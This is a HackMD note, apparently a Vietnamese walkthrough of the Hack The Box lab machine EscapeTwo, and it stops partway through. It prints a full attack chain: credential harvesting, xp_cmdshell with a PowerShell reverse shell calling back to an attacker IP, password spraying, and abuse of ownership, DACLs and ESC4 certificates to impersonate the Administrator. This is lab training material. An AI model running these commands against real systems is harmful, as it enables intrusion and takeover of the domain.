quockhanh020903
  • NEW!
    NEW!  Connect Ideas Across Notes
    Save time and share insights. With Paragraph Citation, you can quote others’ work with source info built in. If someone cites your note, you’ll see a card showing where it’s used—bringing notes closer together.
    Got it
      • Create new note
      • Create a note from template
        • Sharing URL Link copied
        • /edit
        • View mode
          • Edit mode
          • View mode
          • Book mode
          • Slide mode
          Edit mode View mode Book mode Slide mode
        • Customize slides
        • Note Permission
        • Read
          • Only me
          • Signed-in users
          • Everyone
          Only me Signed-in users Everyone
        • Write
          • Only me
          • Signed-in users
          • Everyone
          Only me Signed-in users Everyone
        • Engagement control Commenting, Suggest edit, Emoji Reply
      • Invite by email
        Invitee

        This note has no invitees

      • Publish Note

        Share your work with the world Congratulations! 🎉 Your note is out in the world Publish Note No publishing access yet

        Your note will be visible on your profile and discoverable by anyone.
        Your note is now live.
        This note is visible on your profile and discoverable online.
        Everyone on the web can find and read all notes of this public team.

        Your account was recently created. Publishing will be available soon, allowing you to share notes on your public page and in search results.

        Your team account was recently created. Publishing will be available soon, allowing you to share notes on your public page and in search results.

        Explore these features while you wait
        Complete general settings
        Bookmark and like published notes
        Write a few more notes
        Complete general settings
        Write a few more notes
        See published notes
        Unpublish note
        Please check the box to agree to the Community Guidelines.
        View profile
      • Commenting
        Permission
        Disabled Forbidden Owners Signed-in users Everyone
      • Enable
      • Permission
        • Forbidden
        • Owners
        • Signed-in users
        • Everyone
      • Suggest edit
        Permission
        Disabled Forbidden Owners Signed-in users Everyone
      • Enable
      • Permission
        • Forbidden
        • Owners
        • Signed-in users
      • Emoji Reply
      • Enable
      • Versions and GitHub Sync
      • Note settings
      • Note Insights New
      • Engagement control
      • Make a copy
      • Transfer ownership
      • Delete this note
      • Save as template
      • Insert from template
      • Import from
        • Dropbox
        • Google Drive
        • Gist
        • Clipboard
      • Export to
        • Dropbox
        • Google Drive
        • Gist
      • Download
        • Markdown
        • HTML
        • Raw HTML
    Menu Note settings Note Insights Versions and GitHub Sync Sharing URL Create Help
    Create Create new note Create a note from template
    Menu
    Options
    Engagement control Make a copy Transfer ownership Delete this note
    Import from
    Dropbox Google Drive Gist Clipboard
    Export to
    Dropbox Google Drive Gist
    Download
    Markdown HTML Raw HTML
    Back
    Sharing URL Link copied
    /edit
    View mode
    • Edit mode
    • View mode
    • Book mode
    • Slide mode
    Edit mode View mode Book mode Slide mode
    Customize slides
    Note Permission
    Read
    Only me
    • Only me
    • Signed-in users
    • Everyone
    Only me Signed-in users Everyone
    Write
    Only me
    • Only me
    • Signed-in users
    • Everyone
    Only me Signed-in users Everyone
    Engagement control Commenting, Suggest edit, Emoji Reply
  • Invite by email
    Invitee

    This note has no invitees

    • Publish Note

    Share your work with the world Congratulations! 🎉 Your note is out in the world Publish Note No publishing access yet

    Your note will be visible on your profile and discoverable by anyone.
    Your note is now live.
    This note is visible on your profile and discoverable online.
    Everyone on the web can find and read all notes of this public team.

    Your account was recently created. Publishing will be available soon, allowing you to share notes on your public page and in search results.

    Your team account was recently created. Publishing will be available soon, allowing you to share notes on your public page and in search results.

    Explore these features while you wait
    Complete general settings
    Bookmark and like published notes
    Write a few more notes
    Complete general settings
    Write a few more notes
    See published notes
    Unpublish note
    Please check the box to agree to the Community Guidelines.
    View profile
    Engagement control
    Commenting
    Permission
    Disabled Forbidden Owners Signed-in users Everyone
    Enable
    Permission
    • Forbidden
    • Owners
    • Signed-in users
    • Everyone
    Suggest edit
    Permission
    Disabled Forbidden Owners Signed-in users Everyone
    Enable
    Permission
    • Forbidden
    • Owners
    • Signed-in users
    Emoji Reply
    Enable
    Import from Dropbox Google Drive Gist Clipboard
       Owned this note    Owned this note      
    Published Linked with GitHub
    • Any changes
      Be notified of any changes
    • Mention me
      Be notified of mention me
    • Unsubscribe
    ![image](https://hackmd.io/_uploads/BkACjPPcZx.png) ``` ┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo] └─# nmap -sC -sV 10.10.11.51 -oA /root/Documents/HTB/EscapeTwo/escapetwo Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-31 09:42 EDT Nmap scan report for escapetwo.htb (10.10.11.51) Host is up (0.35s latency). Not shown: 988 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-31 13:43:32Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.sequel.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb | Not valid before: 2024-06-08T17:35:00 |_Not valid after: 2025-06-08T17:35:00 |_ssl-date: 2025-05-31T13:45:03+00:00; +31s from scanner time. 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.sequel.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb | Not valid before: 2024-06-08T17:35:00 |_Not valid after: 2025-06-08T17:35:00 |_ssl-date: 2025-05-31T13:45:03+00:00; +31s from scanner time. 1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM |_ssl-date: 2025-05-31T13:45:03+00:00; +31s from scanner time. | ms-sql-ntlm-info: | 10.10.11.51:1433: | Target_Name: SEQUEL | NetBIOS_Domain_Name: SEQUEL | NetBIOS_Computer_Name: DC01 | DNS_Domain_Name: sequel.htb | DNS_Computer_Name: DC01.sequel.htb | DNS_Tree_Name: sequel.htb |_ Product_Version: 10.0.17763 | ms-sql-info: | 10.10.11.51:1433: | Version: | name: Microsoft SQL Server 2019 RTM | number: 15.00.2000.00 | Product: Microsoft SQL Server 2019 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2025-05-31T13:37:15 |_Not valid after: 2055-05-31T13:37:15 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.sequel.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb | Not valid before: 2024-06-08T17:35:00 |_Not valid after: 2025-06-08T17:35:00 |_ssl-date: 2025-05-31T13:45:03+00:00; +30s from scanner time. 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-05-31T13:45:03+00:00; +31s from scanner time. | ssl-cert: Subject: commonName=DC01.sequel.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb | Not valid before: 2024-06-08T17:35:00 |_Not valid after: 2025-06-08T17:35:00 Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 30s, deviation: 0s, median: 30s | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required | smb2-time: | date: 2025-05-31T13:44:25 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 136.42 seconds ``` Các dịch vụ đang mở là : DNS , KERBEROS , LDAP , SMB , MSSQL , winRM , LDAPS Thông tin quan trọng : * Domain : sequel.htb * DNS : DC01.sequel.htb - Microsoft SQL Server 2019 Thêm tên miền escapetwo.htb vào /etc/hosts ``` ┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo] └─# echo "10.10.11.51 dc01.sequel.htb sequel.htb" | sudo tee -a /etc/hosts 10.10.11.51 dc01.sequel.htb sequel.htb ``` ![image](https://hackmd.io/_uploads/SkTMhPwqbx.png) Chúng ta có thông tin xác thực tài khoản rose / KxEPkKe6R8su Với thông tin xác thực được cung cấp ta sẽ cố gắng kết nối với dịch vụ (SMB , MSSQL , LDAP ..) Đầu tiên ta sẽ tìm kiếm các chia sẻ SMB bằng thông tin xác thực của mình Tìm kiếm thông tin người dùng smb ``` crackmapexec smb escapetwo.htb -u "rose" -p "KxEPkKe6R8su" --rid-brute | grep SidTypeUser ``` Kết nối từ xa vào giao thức smb thông qua thông tin xác thực của người dùng rose đã có ``` ┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo] └─# smbclient -L //10.10.11.51 -U rose -m SMB2 Password for [WORKGROUP\rose]: Sharename Type Comment --------- ---- ------- Accounting Department Disk ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share SYSVOL Disk Logon server share Users Disk Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 10.10.11.51 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available ``` hận thấy  có quyền truy cập vào hai thư mục dùng chung là **Accounting Department** và **Users** Truy cập vào thư mục **Accounting\Department** bằng thông tin xác thực . Ta tìm được file excel ta tải về máy và đọc file . ``` ┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo] └─# smbclient //10.10.11.51/Accounting\ Department -U rose Password for [WORKGROUP\rose]: Try "help" to get a list of possible commands. smb: \> ls . D 0 Sun Jun 9 06:52:21 2024 .. D 0 Sun Jun 9 06:52:21 2024 accounting_2024.xlsx A 10217 Sun Jun 9 06:14:49 2024 accounts.xlsx A 6780 Sun Jun 9 06:52:07 2024 6367231 blocks of size 4096. 868375 blocks available smb: \> get accounts.xlsx getting file \accounts.xlsx of size 6780 as accounts.xlsx (4.0 KiloBytes/sec) (average 4.0 KiloBytes/sec) smb: \> get accounting_2024.xlsx getting file \accounting_2024.xlsx of size 10217 as accounting_2024.xlsx (5.9 KiloBytes/sec) (average 5.0 KiloBytes/sec) ``` Ta mở file với chức open and repair trên Microsoft excel và thu được bảng sau ``` | First Name | Last Name  | Email                | Username | Password          | |------------|------------|----------------------|----------|-------------------| | Angela     | Martin     | angela@sequel.htb     | angela   | 0fwz7Q4mSpurIt99  | | Oscar      | Martinez   | oscar@sequel.htb      | oscar    | 86LxLBMgEWaKUnBG   | | Kevin      | Malone     | kevin@sequel.htb      | kevin    | Md9Wlq1E5bZnVDVo  | | NULL       | NULL       | sa@sequel.htb         | sa       | MSSQLP@ssw0rd!    | ``` Ta có bộ username : sa  và password : MSSQLP@ssw0rd! Khả năng là username và password của Sql trong máy chủ đích Ta sử dụng thông tin xác thực sa để kết nối mssql máy chủ đích ` ``` ┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo] └─# impacket-mssqlclient sa:'MSSQLP@ssw0rd!'@10.10.11.51 Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'. [*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (150 7208) [!] Press help for extra shell commands SQL (sa dbo@master)> enable_xp_cmdshell INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install. INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install. SQL (sa dbo@master)> xp_cmdshell hostname output ------ DC01 NULL SQL (sa dbo@master)> exec xp_cmdshell "chdir" output ------------------- C:\Windows\system32 NULL SQL (sa dbo@master)> EXEC sp_configure 'xp_cmdshell', 1; INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install. SQL (sa dbo@master)> RECONFIGURE; SQL (sa dbo@master)> EXEC sp_configure 'xp_cmdshell'; name minimum maximum config_value run_value ----------- ------- ------- ------------ --------- xp_cmdshell 0 1 1 1 SQL (sa dbo@master)> exec xp_cmdshell "chdir" output ------------------- C:\Windows\system32 NULL SQL (sa dbo@master)> ``` ``` ┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo] └─# impacket-mssqlclient sa:'MSSQLP@ssw0rd!'@10.10.11.51 Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'. [*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (150 7208) [!] Press help for extra shell commands SQL (sa dbo@master)> EXEC xp_cmdshell 'whoami'; ERROR(DC01\SQLEXPRESS): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online. SQL (sa dbo@master)> SQL (sa dbo@master)> EXEC sp_configure 'show advanced options', 1; INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install. SQL (sa dbo@master)> RECONFIGURE; SQL (sa dbo@master)> SQL (sa dbo@master)> EXEC sp_configure 'xp_cmdshell', 1; INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install. SQL (sa dbo@master)> RECONFIGURE; SQL (sa dbo@master)> SQL (sa dbo@master)> EXEC xp_cmdshell 'whoami'; output -------------- sequel\sql_svc NULL SQL (sa dbo@master)> SQL (sa dbo@master)> EXEC xp_cmdshell 'powershell -nop -w hidden -c "$client = New-Object System.Net.Sockets.TCPClient(''10.10.16.59'',293);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + ''PS '' + (pwd).Path + ''> '';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}"' ``` ``` ┌──(root㉿lyquockhanh)-[~] └─# nc -lvnp 293 listening on [any] 293 ... connect to [10.10.16.59] from (UNKNOWN) [10.10.11.51] 50025 whoami sequel\sql_svc PS C:\Windows\system32> cd C:\SQL2019\ExpressAdv_ENU PS C:\SQL2019\ExpressAdv_ENU> ls Directory: C:\SQL2019\ExpressAdv_ENU Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 6/8/2024 3:07 PM 1033_ENU_LP d----- 6/8/2024 3:07 PM redist d----- 6/8/2024 3:07 PM resources d----- 6/8/2024 3:07 PM x64 -a---- 9/24/2019 10:03 PM 45 AUTORUN.INF -a---- 9/24/2019 10:03 PM 788 MEDIAINFO.XML -a---- 6/8/2024 3:07 PM 16 PackageId.dat -a---- 9/24/2019 10:03 PM 142944 SETUP.EXE -a---- 9/24/2019 10:03 PM 486 SETUP.EXE.CONFIG -a---- 6/8/2024 3:07 PM 717 sql-Configuration.INI -a---- 9/24/2019 10:03 PM 249448 SQLSETUPBOOTSTRAPPER.DLL PS C:\SQL2019\ExpressAdv_ENU> cat sql-Configuration.INI [OPTIONS] ACTION="Install" QUIET="True" FEATURES=SQL INSTANCENAME="SQLEXPRESS" INSTANCEID="SQLEXPRESS" RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS" AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE" AGTSVCSTARTUPTYPE="Manual" COMMFABRICPORT="0" COMMFABRICNETWORKLEVEL=""0" COMMFABRICENCRYPTION="0" MATRIXCMBRICKCOMMPORT="0" SQLSVCSTARTUPTYPE="Automatic" FILESTREAMLEVEL="0" ENABLERANU="False" SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS" SQLSVCACCOUNT="SEQUEL\sql_svc" SQLSVCPASSWORD="WqSZAF6CysDQbGb3" SQLSYSADMINACCOUNTS="SEQUEL\Administrator" SECURITYMODE="SQL" SAPWD="MSSQLP@ssw0rd!" ADDCURRENTUSERASSQLADMIN="False" TCPENABLED="1" NPENABLED="1" BROWSERSVCSTARTUPTYPE="Automatic" IAcceptSQLServerLicenseTerms=True PS C:\SQL2019\ExpressAdv_ENU> ``` Ta tìm được 2 thông tin quan trọng ``` SQLSVCACCOUNT="SEQUEL\sql_svc" SQLSVCPASSWORD="WqSZAF6CysDQbGb3" ``` ``` ┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo] └─# cat user.txt angela oscar kevin sa sql_svc ryan ``` ``` ┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo] └─# nxc smb 10.10.11.51 -u user.txt -p 'WqSZAF6CysDQbGb3' SMB 10.10.11.51 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False) SMB 10.10.11.51 445 DC01 [-] sequel.htb\angela:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE SMB 10.10.11.51 445 DC01 [-] sequel.htb\oscar:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE SMB 10.10.11.51 445 DC01 [-] sequel.htb\kevin:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE SMB 10.10.11.51 445 DC01 [-] sequel.htb\sa:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE SMB 10.10.11.51 445 DC01 [+] sequel.htb\sql_svc:WqSZAF6CysDQbGb3 ``` ``` ┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo] └─# nxc ldap 10.10.11.51 -u user.txt -p 'WqSZAF6CysDQbGb3' SMB 10.10.11.51 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False) LDAP 10.10.11.51 389 DC01 [-] sequel.htb\angela:WqSZAF6CysDQbGb3 LDAP 10.10.11.51 389 DC01 [-] sequel.htb\oscar:WqSZAF6CysDQbGb3 LDAP 10.10.11.51 389 DC01 [-] sequel.htb\kevin:WqSZAF6CysDQbGb3 LDAP 10.10.11.51 389 DC01 [-] sequel.htb\sa:WqSZAF6CysDQbGb3 LDAP 10.10.11.51 389 DC01 [+] sequel.htb\sql_svc:WqSZAF6CysDQbGb3 ``` ``` ┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo] └─# nxc winrm 10.10.11.51 -u user.txt -p 'WqSZAF6CysDQbGb3' WINRM 10.10.11.51 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb) WINRM 10.10.11.51 5985 DC01 [-] sequel.htb\angela:WqSZAF6CysDQbGb3 WINRM 10.10.11.51 5985 DC01 [-] sequel.htb\oscar:WqSZAF6CysDQbGb3 WINRM 10.10.11.51 5985 DC01 [-] sequel.htb\kevin:WqSZAF6CysDQbGb3 WINRM 10.10.11.51 5985 DC01 [-] sequel.htb\sa:WqSZAF6CysDQbGb3 WINRM 10.10.11.51 5985 DC01 [-] sequel.htb\sql_svc:WqSZAF6CysDQbGb3 WINRM 10.10.11.51 5985 DC01 [+] sequel.htb\ryan:WqSZAF6CysDQbGb3 (Pwn3d!) ``` Tìm được username : ryan và password : WqSZAF6CysDQbGb3 để kết nối từ xa tới hệ thống thông qua giao thức winrm ``` ┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo/Certify] └─# evil-winrm -i 10.10.11.51 -u ryan -p WqSZAF6CysDQbGb3 Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\ryan\Documents> cd ../ *Evil-WinRM* PS C:\Users\ryan> cd Desktop *Evil-WinRM* PS C:\Users\ryan\Desktop> ls Directory: C:\Users\ryan\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 5/31/2025 6:37 AM 34 user.txt *Evil-WinRM* PS C:\Users\ryan\Desktop> cat user.txt f38ad9d224f1a9606fc05501f433f763 ``` ![image](https://hackmd.io/_uploads/H1CYnwP9-g.png) Bây giờ đã có một shell và đã liệt kê, tôi muốn khởi động Bloodhound và đánh dấu tất cả người dùng mà chúng tôi có thông tin xác thực hợp lệ là sở hữu và xem chúng tôi có những đường dẫn tấn công nào để nâng cao đặc quyền. ``` ┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo] └─# bloodhound-python -u 'ryan' -p 'WqSZAF6CysDQbGb3' -d sequel.htb -dc DC01.sequel.htb -ns 10.10.11.51 -c All --zip INFO: Found AD domain: sequel.htb INFO: Getting TGT for user WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (DC01.sequel.htb:88)] [Errno 111] Connection refused INFO: Connecting to LDAP server: DC01.sequel.htb INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 1 computers INFO: Connecting to LDAP server: DC01.sequel.htb INFO: Found 10 users INFO: Found 59 groups INFO: Found 2 gpos INFO: Found 1 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: DC01.sequel.htb INFO: Done in 01M 20S INFO: Compressing output into 20250531102900_bloodhound.zip ``` Chúng ta có thể thấy rằng người dùng sở hữu của chúng ta là Ryan là “WriteOwner” trên CA_SVC. ![image](https://hackmd.io/_uploads/ryaA3DvcWe.png) ![image](https://hackmd.io/_uploads/HJPxavw9Wg.png) ``` ┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo] └─# impacket-owneredit -action write -new-owner ryan -target ca_svc sequel.htb/ryan:WqSZAF6CysDQbGb3 Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Current owner information below [*] - SID: S-1-5-21-548670397-972687484-3496335370-512 [*] - sAMAccountName: Domain Admins [*] - distinguishedName: CN=Domain Admins,CN=Users,DC=sequel,DC=htb [*] OwnerSid modified successfully! ``` ``` ──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo] └─# impacket-dacledit -action write -rights FullControl -principal ryan -target ca_svc sequel.htb/ryan:WqSZAF6CysDQbGb3 Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] DACL backed up to dacledit-20250531-110856.bak [*] DACL modified successfully! ``` ``` ┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo] └─# certipy-ad shadow auto -u 'ryan@sequel.htb' -p 'WqSZAF6CysDQbGb3' -account ca_svc -dc-ip 10.10.11.51 Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Targeting user 'ca_svc' [*] Generating certificate [*] Certificate generated [*] Generating Key Credential [*] Key Credential generated with DeviceID '3b939dea-960e-93eb-58ac-185a70924994' [*] Adding Key Credential with device ID '3b939dea-960e-93eb-58ac-185a70924994' to the Key Credentials for 'ca_svc' [*] Successfully added Key Credential with device ID '3b939dea-960e-93eb-58ac-185a70924994' to the Key Credentials for 'ca_svc' [*] Authenticating as 'ca_svc' with the certificate [*] Using principal: ca_svc@sequel.htb [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to 'ca_svc.ccache' [*] Trying to retrieve NT hash for 'ca_svc' [*] Restoring the old Key Credentials for 'ca_svc' [*] Successfully restored the old Key Credentials for 'ca_svc' [*] NT hash for 'ca_svc': 3b181b914e7a9d5508ea1e20bc2b7fce \ ``` ``` ┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo] └─# certipy-ad find -u 'ca_svc' -hashes ':3b181b914e7a9d5508ea1e20bc2b7fce' -stdout -vulnerable -dc-ip 10.10.11.51 Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Finding certificate templates [*] Found 34 certificate templates [*] Finding certificate authorities [*] Found 1 certificate authority [*] Found 12 enabled certificate templates [*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA [!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error. [*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP [*] Got CA configuration for 'sequel-DC01-CA' [*] Enumeration output: Certificate Authorities 0 CA Name : sequel-DC01-CA DNS Name : DC01.sequel.htb Certificate Subject : CN=sequel-DC01-CA, DC=sequel, DC=htb Certificate Serial Number : 152DBD2D8E9C079742C0F3BFF2A211D3 Certificate Validity Start : 2024-06-08 16:50:40+00:00 Certificate Validity End : 2124-06-08 17:00:40+00:00 Web Enrollment : Disabled User Specified SAN : Disabled Request Disposition : Issue Enforce Encryption for Requests : Enabled Permissions Owner : SEQUEL.HTB\Administrators Access Rights ManageCertificates : SEQUEL.HTB\Administrators SEQUEL.HTB\Domain Admins SEQUEL.HTB\Enterprise Admins ManageCa : SEQUEL.HTB\Administrators SEQUEL.HTB\Domain Admins SEQUEL.HTB\Enterprise Admins Enroll : SEQUEL.HTB\Authenticated Users Certificate Templates 0 Template Name : DunderMifflinAuthentication Display Name : Dunder Mifflin Authentication Certificate Authorities : sequel-DC01-CA Enabled : True Client Authentication : True Enrollment Agent : False Any Purpose : False Enrollee Supplies Subject : False Certificate Name Flag : SubjectRequireCommonName SubjectAltRequireDns Enrollment Flag : AutoEnrollment PublishToDs Private Key Flag : 16842752 Extended Key Usage : Client Authentication Server Authentication Requires Manager Approval : False Requires Key Archival : False Authorized Signatures Required : 0 Validity Period : 1000 years Renewal Period : 6 weeks Minimum RSA Key Length : 2048 Permissions Enrollment Permissions Enrollment Rights : SEQUEL.HTB\Domain Admins SEQUEL.HTB\Enterprise Admins Object Control Permissions Owner : SEQUEL.HTB\Enterprise Admins Full Control Principals : SEQUEL.HTB\Cert Publishers Write Owner Principals : SEQUEL.HTB\Domain Admins SEQUEL.HTB\Enterprise Admins SEQUEL.HTB\Administrator SEQUEL.HTB\Cert Publishers Write Dacl Principals : SEQUEL.HTB\Domain Admins SEQUEL.HTB\Enterprise Admins SEQUEL.HTB\Administrator SEQUEL.HTB\Cert Publishers Write Property Principals : SEQUEL.HTB\Domain Admins SEQUEL.HTB\Enterprise Admins SEQUEL.HTB\Administrator SEQUEL.HTB\Cert Publishers [!] Vulnerabilities ESC4 : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissions ``` Phát hiện lỗ hổng ESC4 ``` certipy-ad req -username ca_svc@sequel.htb -p 'Password123!!' -ca sequel-DC01-CA - template DunderMifflinAuthentication -target dc01.sequel.htb -upn administrator@sequel.htb ``` ``` ──(root㉿lyquockhanh)-[~] └─# nano /etc/resolv.conf ┌──(root㉿lyquockhanh)-[~] └─# cat /etc/resolv.conf # Generated by NetworkManager search localdomain nameserver 10.10.11.51 ``` ``` ┌──(root㉿lyquockhanh)-[~] └─# certipy-ad template -u ca_svc@sequel.htb -target sequel.htb \ -template DunderMifflinAuthentication \ -hashes ':3b181b914e7a9d5508ea1e20bc2b7fce' \ -save-old -debug Certipy v4.8.2 - by Oliver Lyak (ly4k) [+] Trying to resolve 'sequel.htb' at '10.10.11.51' [+] Trying to resolve 'SEQUEL.HTB' at '10.10.11.51' [+] Authenticating to LDAP server [+] Bound to ldaps://10.10.11.51:636 - ssl [+] Default path: DC=sequel,DC=htb [+] Configuration path: CN=Configuration,DC=sequel,DC=htb [*] Saved old configuration for 'DunderMifflinAuthentication' to 'DunderMifflinAuthentication.json' [*] Updating certificate template 'DunderMifflinAuthentication' [+] MODIFY_DELETE: [+] pKIExtendedKeyUsage: [] [+] msPKI-Certificate-Application-Policy: [] [+] MODIFY_REPLACE: [+] nTSecurityDescriptor: [b'\x01\x00\x04\x9c0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x02\x00\x1c\x00\x01\x00\x00\x00\x00\x00\x14\x00\xff\x01\x0f\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00\xc8\xa3\x1f\xdd\xe9\xba\xb8\x90,\xaes\xbb\xf4\x01\x00\x00'] [+] flags: [b'0'] [+] pKIDefaultKeySpec: [b'2'] [+] pKIKeyUsage: [b'\x86\x00'] [+] pKIMaxIssuingDepth: [b'-1'] [+] pKICriticalExtensions: [b'2.5.29.19', b'2.5.29.15'] [+] pKIExpirationPeriod: [b'\x00@\x1e\xa4\xe8e\xfa\xff'] [+] pKIDefaultCSPs: [b'1,Microsoft Enhanced Cryptographic Provider v1.0'] [+] msPKI-Enrollment-Flag: [b'0'] [+] msPKI-Private-Key-Flag: [b'16842768'] [+] msPKI-Certificate-Name-Flag: [b'1'] [*] Successfully updated 'DunderMifflinAuthentication' ``` ``` ┌──(root㉿lyquockhanh)-[~] └─# certipy-ad req -u ca_svc@sequel.htb -target sequel.htb \ -upn administrator@sequel.htb \ -ca sequel-DC01-CA -template DunderMifflinAuthentication \ -dc-ip 10.10.11.51 \ -hashes ':3b181b914e7a9d5508ea1e20bc2b7fce' \ -key-size 4096 -debug Certipy v4.8.2 - by Oliver Lyak (ly4k) [+] Trying to resolve 